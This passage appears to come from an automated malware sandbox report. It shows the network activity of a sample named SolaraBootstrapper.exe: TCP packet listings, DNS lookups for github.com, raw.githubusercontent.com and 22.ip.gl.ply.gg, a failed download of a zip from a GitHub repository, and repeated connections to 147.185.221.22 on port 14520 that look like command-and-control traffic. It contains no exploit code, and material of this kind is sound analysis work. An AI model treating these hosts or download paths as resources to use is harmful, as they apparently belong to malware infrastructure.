                                                              Aug 24, 2024 21:55:05.248281956 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248323917 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248339891 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.248347044 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248383999 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248403072 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.248409986 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248490095 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.248497009 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248533964 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.248601913 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.248608112 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.249375105 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.249418020 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.249535084 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.249543905 CEST44349730140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.249588966 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.255549908 CEST49730443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.274799109 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.274842024 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.274979115 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.275495052 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.275506973 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.753969908 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.754040956 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.757272959 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.757294893 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.757580042 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.759243965 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.804502010 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.870563030 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.870667934 CEST44349731185.199.109.133192.168.2.4
                                                              Aug 24, 2024 21:55:05.870717049 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.871109009 CEST49731443192.168.2.4185.199.109.133
                                                              Aug 24, 2024 21:55:05.874149084 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.874195099 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:05.874331951 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.874643087 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:05.874658108 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.514379025 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.516380072 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.516412020 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.804547071 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.804855108 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.804904938 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.804939985 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.804944038 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.804964066 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.804980993 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.805001020 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.805108070 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.805401087 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.805440903 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.809349060 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.809357882 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.813175917 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.851244926 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.895375013 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.895410061 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.895535946 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.895617962 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.895643950 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896024942 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896054029 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896081924 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896101952 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.896111012 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896121025 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.896516085 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896548033 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896559954 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.896569014 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896605015 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.896610022 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896647930 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.896686077 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.896692991 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.897474051 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.897516012 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.897542000 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.897581100 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.897588968 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942289114 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942343950 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942378044 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942411900 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942450047 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942451000 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.942461967 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.942492008 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.986844063 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.986884117 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.986916065 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.986948013 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.986979961 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.986977100 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987001896 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987023115 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987262964 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987301111 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987307072 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987435102 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987462044 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987493992 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987502098 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987509966 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987550974 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987581968 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987591982 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987615108 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987654924 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988382101 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988461018 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988497019 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988504887 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988512993 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988549948 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988552094 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988559961 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988600969 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988605976 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989290953 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989326000 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989361048 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989392996 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989398956 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.989408016 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989455938 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989495039 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989538908 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.989545107 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.990251064 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.990284920 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.990293026 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.990298986 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.993079901 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.993087053 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:07.001943111 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:56:27.234853983 CEST4974014520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:27.239749908 CEST1452049740147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:56:27.239815950 CEST4974014520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:27.344769001 CEST4974014520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:27.349965096 CEST1452049740147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:56:40.575408936 CEST4974014520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:40.580390930 CEST1452049740147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:56:48.603740931 CEST1452049740147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:56:48.603975058 CEST4974014520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:50.932372093 CEST4974014520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:50.934443951 CEST4974114520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:50.937880039 CEST1452049740147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:56:50.939851999 CEST1452049741147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:56:50.939924002 CEST4974114520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:51.145322084 CEST4974114520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:56:51.150255919 CEST1452049741147.185.221.22192.168.2.4
                                                              Aug 24, 2024 21:57:03.276679039 CEST4974114520192.168.2.4147.185.221.22
                                                              Aug 24, 2024 21:57:03.281585932 CEST1452049741147.185.221.22192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Aug 24, 2024 21:55:02.929810047 CEST6457253192.168.2.41.1.1.1
                                                              Aug 24, 2024 21:55:03.916169882 CEST6457253192.168.2.41.1.1.1
                                                              Aug 24, 2024 21:55:03.955718994 CEST53645721.1.1.1192.168.2.4
                                                              Aug 24, 2024 21:55:03.958954096 CEST53645721.1.1.1192.168.2.4
                                                              Aug 24, 2024 21:55:05.261521101 CEST6472453192.168.2.41.1.1.1
                                                              Aug 24, 2024 21:55:05.274218082 CEST53647241.1.1.1192.168.2.4
                                                              Aug 24, 2024 21:56:27.184828043 CEST5235853192.168.2.41.1.1.1
                                                              Aug 24, 2024 21:56:27.225749969 CEST53523581.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Aug 24, 2024 21:55:02.929810047 CEST192.168.2.41.1.1.10x2c37Standard query (0)github.comA (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:03.916169882 CEST192.168.2.41.1.1.10x2c37Standard query (0)github.comA (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:05.261521101 CEST192.168.2.41.1.1.10x19c4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:56:27.184828043 CEST192.168.2.41.1.1.10xdcc9Standard query (0)22.ip.gl.ply.ggA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Aug 24, 2024 21:55:03.955718994 CEST1.1.1.1192.168.2.40x2c37No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:03.958954096 CEST1.1.1.1192.168.2.40x2c37No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:05.274218082 CEST1.1.1.1192.168.2.40x19c4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:05.274218082 CEST1.1.1.1192.168.2.40x19c4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:05.274218082 CEST1.1.1.1192.168.2.40x19c4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:55:05.274218082 CEST1.1.1.1192.168.2.40x19c4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                              Aug 24, 2024 21:56:27.225749969 CEST1.1.1.1192.168.2.40xdcc9No error (0)22.ip.gl.ply.gg147.185.221.22A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • github.com
                                                              • raw.githubusercontent.com

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449730140.82.121.44437200C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-08-24 19:55:04 UTC105OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                                                              Host: github.com
                                                              Connection: Keep-Alive
                                                              2024-08-24 19:55:05 UTC473INHTTP/1.1 404 Not Found
                                                              Server: GitHub.com
                                                              Date: Sat, 24 Aug 2024 19:55:04 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                              Cache-Control: no-cache
                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                              X-Frame-Options: deny
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 0
                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                              2024-08-24 19:55:05 UTC3268INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                              2024-08-24 19:55:05 UTC369INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65
                                                              Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
                                                              2024-08-24 19:55:05 UTC1370INData Raw: 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65
                                                              Data Ascii: com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconne
                                                              2024-08-24 19:55:05 UTC1370INData Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 37 39 62 63 61 37 31 34 35 33 39 33 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c
                                                              Data Ascii: " rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/l
                                                              2024-08-24 19:55:05 UTC1370INData Raw: 6e 61 6c 5f 75 78 5f 68 69 73 74 6f 72 79 5f 72 65 66 73 22 2c 22 63 6f 70 69 6c 6f 74 5f 66 6f 6c 6c 6f 77 75 70 5f 74 6f 5f 61 67 65 6e 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 69 6d 70 6c 69 63 69 74 5f 63 6f 6e 74 65 78 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 73 6d 65 6c 6c 5f 69 63 65 62 72 65 61 6b 65 72 5f 75 78 22 2c 22 63 75 73 74 6f 6d 5f 69 6e 70 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 5f 61 7a 75 72 65 5f 76 61 72 69 61 6e 74 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 66 61 69 6c 62 6f 74 5f 68 61 6e 64 6c 65 5f 6e 6f 6e 5f 65 72 72 6f 72 73 22 2c 22 67 65 6f 6a 73 6f 6e 5f 61 7a 75 72 65 5f 6d 61 70 73 22 2c 22 67 68 61 73 5f 63 6f 70 69 6c 6f 74 5f 61 67 65 6e 74 73 5f 67 61 5f 77 65 62 5f 75 70 64 61 74 65 73 22 2c 22 67 68 6f 73 74 5f 70 69
                                                              Data Ascii: nal_ux_history_refs","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","custom_inp","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_maps","ghas_copilot_agents_ga_web_updates","ghost_pi
                                                              2024-08-24 19:55:05 UTC281INData Raw: 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 34 61 36 32 66 32 38 33 32 32 38 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73
                                                              Data Ascii: onymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-4a62f2832289.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets
                                                              2024-08-24 19:55:05 UTC1370INData Raw: 75 62 5f 73 65 6c 65 63 74 6f 72 2d 6f 62 73 65 72 76 65 72 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66
                                                              Data Ascii: ub_selector-observer_dist_index_esm_js-f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4f
                                                              2024-08-24 19:55:05 UTC1370INData Raw: 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 2d 33 65 66 64 61 33 2d 37 30 31 61 63 62 36 39 31 39 33 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f
                                                              Data Ascii: de_modules_delegated-events_dist_in-3efda3-701acb69193f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-no
